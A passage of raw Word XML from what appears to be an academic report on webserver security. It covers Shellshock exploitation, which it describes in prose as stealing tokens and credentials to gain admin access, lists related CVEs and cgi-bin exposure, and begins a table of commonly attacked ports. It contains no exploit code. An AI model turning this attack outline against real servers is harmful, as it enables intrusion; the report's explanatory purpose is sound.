        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1109/45.839642","ISSN":"02786648","abstract":"Cache memory is a small, fast memory unit between the central processing unit (CPU) and the main storage memory. It stores frequently accessed instructions and data for the CPU. Current efforts are focused on improving the performance of such units. One way of doing this is through the reduction of the speed gap between the CPU and the memory.","author":[{"dropping-particle":"","family":"Stacpoole","given":"Richard","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Jamil","given":"Tariq","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"IEEE Potentials","id":"ITEM-1","issued":{"date-parts":[["2000"]]},"title":"Cache memories","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=031eaafe-63b4-4c51-91b4-34068570c4c7"]}],"mendeley":{"formattedCitation":"[63]","plainTextFormattedCitation":"[63]","previouslyFormattedCitation":"[63]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00AE5341" w:rsidRPr="00AE5341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[63]</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidR="001913B4">
        <w:t>Random Access Memory (RAM)</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"author":[{"dropping-particle":"","family":"university","given":"Utica","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"utica.edu","id":"ITEM-1","issue":"1","issued":{"date-parts":[["2017"]]},"page":"10","title":"Dynamic RAM Overview","type":"article-journal","volume":"1"},"uris":["http://www.mendeley.com/documents/?uuid=5b91f186-085e-4844-82c8-8ed6b9b455f6"]}],"mendeley":{"formattedCitation":"[64]","plainTextFormattedCitation":"[64]","previouslyFormattedCitation":"[64]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00AE5341" w:rsidRPr="00AE5341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[64]</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:t xml:space="preserve"> that contains administrator account login information</w:t>
      </w:r>
      <w:r w:rsidR="001913B4">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002F6194">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B75E7D">
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidR="002F6194">
        <w:t xml:space="preserve"> allows user tokens</w:t>
      </w:r>
      <w:r w:rsidR="001913B4">
        <w:t xml:space="preserve"> and/or password credentials (hashed)</w:t>
      </w:r>
      <w:r w:rsidR="002F6194">
        <w:t xml:space="preserve"> to be stolen and then pipes a string command</w:t>
      </w:r>
      <w:r w:rsidR="00B75E7D">
        <w:t xml:space="preserve"> using a combination of the three previously discusses techniques</w:t>
      </w:r>
      <w:r w:rsidR="002F6194">
        <w:t xml:space="preserve"> to bypass the root directory security  </w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t>to gain full</w:t>
      </w:r>
      <w:r w:rsidR="002F6194">
        <w:t xml:space="preserve"> administrative</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> access to the webserver </w:t>
      </w:r>
      <w:r w:rsidR="002F6194">
        <w:t>including the backend database containing sensitive user data</w:t>
      </w:r>
      <w:r w:rsidR="00B75E7D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397172AB" w14:textId="1FF4BA40" w:rsidR="00211E5D" w:rsidRDefault="00B75E7D" w:rsidP="00B75E7D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t>lthough</w:t>
      </w:r>
      <w:r w:rsidR="002F6194">
        <w:t xml:space="preserve"> the Shellshock vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> was patched on the 24/09/14 after being discovered, researchers did not know the full extent in which the vulnerability had been exploited in the years before the official discovery. After the initial patch</w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> subsequent ‘Shellshock’ vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00B41EEB">
        <w:t>were</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> found: </w:t>
      </w:r>
      <w:r w:rsidR="00211E5D" w:rsidRPr="00211E5D">
        <w:t>CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> within Apache systems that have since been patched</w:t>
      </w:r>
      <w:r w:rsidR="00AA4155">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BA4830">
        <w:t xml:space="preserve"> although this vulnerability is an ongoing concern for security researchers</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007642C5">
        <w:t>However,</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> it is assumed that </w:t>
      </w:r>
      <w:r w:rsidR="007642C5">
        <w:t>inept</w:t>
      </w:r>
      <w:r w:rsidR="00AA4155">
        <w:t xml:space="preserve"> Linux</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> systems </w:t>
      </w:r>
      <w:r w:rsidR="00AA4155">
        <w:t>administrators</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> whom are not aware of this vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00AA4155">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> have not patched</w:t>
      </w:r>
      <w:r w:rsidR="00AA4155">
        <w:t xml:space="preserve"> or disabled the [/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA4155">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA4155">
        <w:t>-bin/] and [/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA4155">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA4155">
        <w:t>-sys/] directories within</w:t>
      </w:r>
      <w:r w:rsidR="00211E5D">
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="007642C5">
        <w:t>heir Apache webservers</w:t>
      </w:r>
      <w:r w:rsidR="00AA4155">
        <w:t xml:space="preserve"> from being utilised,</w:t>
      </w:r>
      <w:r w:rsidR="007642C5">
        <w:t xml:space="preserve"> thus leaving many systems around the globe vulnerable to ‘Shellshock’ exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45979B29" w14:textId="34DB269B" w:rsidR="009D141D" w:rsidRDefault="009D141D" w:rsidP="00431E0E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Well known applications such as MySQL backend database and WordPress</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00006CB1">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"9780470149461","abstract":"A Reference for the. mm m Rest of Us! FREE eTips at .com podcasf, vlog even ,our blogl Lisa Sabin-Wilson FOR by Lisa Sabin-Wilson Foreword by Matt Mullenweg Co-Founder of Wiley Publishing, Inc.","author":[{"dropping-particle":"","family":"Sabin-Wilson","given":"Lisa","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Director","id":"ITEM-1","issued":{"date-parts":[["2008"]]},"title":"WordPress for Dummies","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=36080f82-69af-464b-a318-666f035d4ffb"]}],"mendeley":{"formattedCitation":"[65]","plainTextFormattedCitation":"[65]","previouslyFormattedCitation":"[65]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00AE5341" w:rsidRPr="00AE5341">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[65]</w:t>
      </w:r>
      <w:r w:rsidR="00AE5341">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> applications are also vulnerable to attack when not configured correctly or patched. These industry standard webserver applications will be </w:t>
      </w:r>
      <w:r w:rsidR="00FB57AF">
        <w:t xml:space="preserve">researched and </w:t>
      </w:r>
      <w:r>
        <w:t>discussed in further detail within the</w:t>
      </w:r>
      <w:r w:rsidR="00FB57AF">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB57AF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">HTML5 and Database </w:t>
      </w:r>
      <w:r w:rsidR="00187177">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB57AF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>section of this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FF2D0F" w14:textId="37A35B9E" w:rsidR="0039624D" w:rsidRDefault="0039624D" w:rsidP="0039624D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc40134035"/>
      <w:r>
        <w:t>2.2.</w:t>
      </w:r>
      <w:r w:rsidR="00F876CA">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Webserver Protocols and Port Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="32EEAC52" w14:textId="5DBE9F7E" w:rsidR="00513476" w:rsidRDefault="00176EDE" w:rsidP="000E336C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Known vulnerable protocols and their default ports that are exposed by webservers to deliver </w:t>
      </w:r>
      <w:r w:rsidR="00513476">
        <w:t xml:space="preserve">application </w:t>
      </w:r>
      <w:r>
        <w:t>services to end clients</w:t>
      </w:r>
      <w:r w:rsidR="00F42B45">
        <w:t>. These ports</w:t>
      </w:r>
      <w:r w:rsidR="00513476">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are researched by attackers </w:t>
      </w:r>
      <w:r w:rsidR="00513476">
        <w:t xml:space="preserve">within the </w:t>
      </w:r>
      <w:r w:rsidR="00B54EF5">
        <w:t>information gathering (reconnaissance)</w:t>
      </w:r>
      <w:r w:rsidR="00513476">
        <w:t xml:space="preserve"> stage of an attack</w:t>
      </w:r>
      <w:r w:rsidR="00F42B45">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00513476">
        <w:t xml:space="preserve"> to analyse what applications are being utilised by the webserver that may be vulnerable along with unintended known vulnerable ports that can be easily exploited. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7EE156" w14:textId="2B88A7AE" w:rsidR="00527C88" w:rsidRDefault="00513476" w:rsidP="00513476">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The most common vulnerable ports and services utilised</w:t>
      </w:r>
      <w:r w:rsidR="00176EDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by webservers can be found in </w:t>
      </w:r>
      <w:r w:rsidRPr="00513476">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Table 1.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9067" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1696"/>
        <w:gridCol w:w="851"/>
        <w:gridCol w:w="6520"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C05CF6" w14:paraId="2282756B" w14:textId="77777777" w:rsidTr="00C05CF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="60C0C7EC" w14:textId="4075183C" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="00527C88">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527C88">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="5EC2A3D7" w14:textId="7EFB009A" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="00527C88">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527C88">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6520" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="AEAAAA" w:themeFill="background2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="6C1459A7" w14:textId="3EE3CDFF" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="00527C88">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527C88">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05CF6" w14:paraId="7F336A36" w14:textId="77777777" w:rsidTr="00C05CF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="01DF3F73" w14:textId="067401DE" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C91CD61" w14:textId="2B784ADC" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="308101B2" w14:textId="2339CBAA" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:r>
              <w:t>Unsecure website browser communication protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05CF6" w14:paraId="518EEF20" w14:textId="77777777" w:rsidTr="00C05CF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="727E8882" w14:textId="6D5957FA" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527C88">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>HTTPS (SSL/TLS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B47DCD5" w14:textId="1790F973" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EEFD017" w14:textId="2FBE6C59" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:r>
              <w:t>Cryptographic website browser communication protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05CF6" w14:paraId="0978B0A7" w14:textId="77777777" w:rsidTr="00C05CF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="737871A5" w14:textId="3369031F" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527C88">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EACAAAB" w14:textId="5EA97A87" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="711C5954" w14:textId="3BCC3BB6" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:r>
              <w:t>User authentication with unencrypted server/client file transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05CF6" w14:paraId="38D7C2EB" w14:textId="77777777" w:rsidTr="00C05CF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="761DBF45" w14:textId="3D4E9967" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527C88">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E3FBAA4" w14:textId="7B00EE4D" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DE81A18" w14:textId="5384FA53" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:r>
              <w:t>E-Mail message transfer agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05CF6" w14:paraId="6CE5A844" w14:textId="77777777" w:rsidTr="00C05CF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="7FE3358D" w14:textId="5A97210A" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527C88">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>POP3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A8A63EC" w14:textId="72DB7544" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A283EC2" w14:textId="682E9C79" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0098488E">
            <w:r>
              <w:t>E-Mail message access agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05CF6" w14:paraId="53768D01" w14:textId="77777777" w:rsidTr="00C05CF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="610AB882" w14:textId="6A5D550E" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="0062384F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73554A6F" w14:textId="0AD73360" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0062384F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A158427" w14:textId="1994E53C" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0062384F">
            <w:r>
              <w:t>E-Mail message access agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05CF6" w14:paraId="4F41EE84" w14:textId="77777777" w:rsidTr="00C05CF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="24CBFFD0" w14:textId="5EA9A9A9" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="0062384F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527C88">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4121A721" w14:textId="2DDEA09F" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0062384F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43156B4A" w14:textId="50C4C0A3" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="0062384F">
            <w:r>
              <w:t>Hierarchical naming system for computer systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05CF6" w14:paraId="5031C586" w14:textId="77777777" w:rsidTr="00C05CF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="0FA3FCA2" w14:textId="0CA44502" w:rsidR="00C05CF6" w:rsidRPr="00527C88" w:rsidRDefault="00C05CF6" w:rsidP="00E943D8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527C88">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="211F8B0D" w14:textId="14F8225D" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="00E943D8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52262E0A" w14:textId="0E4B0BF3" w:rsidR="00C05CF6" w:rsidRDefault="00C05CF6" w:rsidP="00E943D8">
            <w:r>
              <w:t>Plain text remote shell device configuration utility</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C05CF6" w14:paraId="799060C2" w14:textId="77777777" w:rsidTr="00C05CF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
